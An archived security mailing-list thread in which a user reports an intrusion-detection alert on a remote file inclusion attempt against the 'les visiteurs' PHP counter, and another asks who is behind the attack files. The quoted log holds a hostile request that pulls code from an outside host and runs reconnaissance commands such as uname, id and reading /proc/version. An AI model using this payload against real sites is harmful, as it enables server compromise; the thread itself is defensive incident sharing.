lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: dan at lockedbox.net (Dan)
Subject: file inclusion (les visiteurs)

This is the same set of files that I noticed last week(xfteam.net) it seems
they closed their domain down? (I cannot find it)
Does anyone know if these ppl are a real sec organisation? or just some
kiddies ?

Cheers,
Daniel.

"Evert Daman" <evert@...ipix.org> wrote:

> 
> last night snort detected this request:
> 
> GET
>
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
> 
> 
> because i patched 'les visiteurs' as described by 'matthieu peschaud'
> on bugtraq on the 26 of october nothing happend, but it looks like someone
> is trying to exploit this bug. 
> just want to mention it to this wonderfull list :)
> 
> kind regards,
> Evert

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ